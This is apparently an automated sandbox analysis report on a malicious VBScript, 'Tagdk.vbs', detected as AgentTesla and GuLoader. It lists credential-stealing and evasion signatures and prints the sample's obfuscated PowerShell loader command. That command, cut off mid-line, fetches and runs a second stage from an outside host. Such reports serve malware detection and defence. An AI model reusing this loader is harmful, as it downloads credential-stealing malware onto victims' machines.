Edit tour
Windows
Analysis Report
Tagdk.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Classification
- System is w10x64
- wscript.exe (PID: 6648 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Tagdk .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 604 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " function Propje9 ([ String]$Hj sp){$Avanc ereno=5;Fo r($Genne=4 ; $Genne - lt $Hjsp.L ength-1; $ Genne+=$Av ancereno){ $Mdeaftner =$Hjsp.Sub string( $Genne , 1);$Skot skterr+=$M deaftner}; $Skotskter r;}$Abonne men=Propje 9 'AntehEn sit BegtMo nopBucksTr yn:Admi/ F or/IndudNo nurRekiiAf stvLcsyeSu bo.lattgSm itoDigeoDi scgDatalHa rpe fug. C occIssuoEp icmPoly/ i ntutowecLo ng?diureTr anx TyppPa mpointer P hitFutu=Sy mfdKasboBe rawBundnWa rll EntoCo mmaNonsdGt es&JuniiOm nidGrns=Un fr1UdvadBe nzsSamm7Fr emuskrnXLo osoSpdbiDe moivargNCu spl FsfQEl ecLMathUEf teVcullaRu fiO Hal6Fo rskKirigfr er1squa9St ifnAlimcNu mifBagff R hiq Refe G ge2 Resg F laoUncamKo re0Giga '; $Skotskter r01=Propje 9 'Prini S pyeUnquxSu rp ';$Home m163 = Pro pje9 'Atte \Makrs Api y OvesPrep wagreoAuth wKitt6Forb 4Nond\Nonb WRushiWaga nUnded Svi o SauwDrag s CacPDepu oPrydwForf eLignrGrsg SSocihErot efisklPast lMemo\Knst vDete1Famo . Bal0 Tim \Backpdati o pegw Sem e BikrRhea sLobehBank e Skalsola l Sna.Benz eGavsxGrap eCarn ';. ($Skotsk terr01) (P ropje9 'Br an$SymfRMu siaVoldtCi gaiParto M ooeMakur U dvaFearvPo lai Gra2Su pe=Inte$La vre GngnSi ppv Gad:Co ppw Afsi G ednDyredHe gliIngerUd et ') ; . ($ Skotskterr 01) (Propj e9 'Bort$ FabHOveroI deam MoneG ummmrung1 Tre6Merp3A pop=mold$G aelRApopaG rantLovriI dyloEkvieA alerSupra BeavSupeiT amp2Cadd+G odt$SemoHB urso CysmM ulteAktemM ess1 For6Z ine3Gobb ' ) ; . ($Skotsk terr01) (P ropje9 'Ha ge$MonoHRe daeFeritAe roeAnterSa deoClampCa nd Rede=Bo ur Komm(Da me(TolegPr siw Flnm S caiPrin Mu ltw EksiHe atnTeat3Cl oi2Narr_Sk ylpAnatrQu aroCompcDa nieFuglsMo rdsNonv Re i-AuktFTse m PrecPDru irfyrsoSpy dcCryoePaa bsIcons Gl oI IdrdOut s=Mist$Tyr a{KhouPTra nIStilDSja k}Phal)for m. OxiCRom ao KlimGes vm Nona Tr onSelvdWed lL UnciWin tnDybkeGul c) Nar Ker -insesFidu p Hvil Rad i QuatLaqu Unnu[Sukk c ModhLafg aSpoorEndu ]Flyv3Klav 4Deat '); & ( $Skotskter r01) (Prop je9 'Deaf$ DrmSUnada colmNatsm fese Than Fisc Kol=E nce Tids$M ongHViateC oevtRedeeD atar SkroC entp Sys[c ons$DigtH Pine NevtS uppeStjerJ ocaoprimp Unc.AliecA ntio Typuf irenAndetS kar- Vet2B eas]Wond ' ); & ($S kotskterr0 1) (Propje 9 ' Alk$me loD Mina S ubtUnedaSk va= Far(Ov erTGlyceGr ensBudgt P re-UnpePCh imaPaattCr aihEnhe Wa n$vaerHHaa noDestmDia tePetnmNsk e1Fase6Tra c3Mech) En c Unop-Lav kAMarknNon cd Ant Unp u(Kiss[ Af pIBactnPun ktNbetPSti ltHelprBea r]Bank:Uni n: DklsPar tiEmpizMur ee Sun Ele -runeeSkry q Fly Rive 8 Ver)Bava ') ;if ($ Data) {.$H omem163 $S ammen;} el se {;$Skot skterr00=P ropje9 'Ru skSCarbtSt ilaStaarCo ddtAkti-Pi tiBskatiDa lgtRisosCa prTTyngror acaElfen V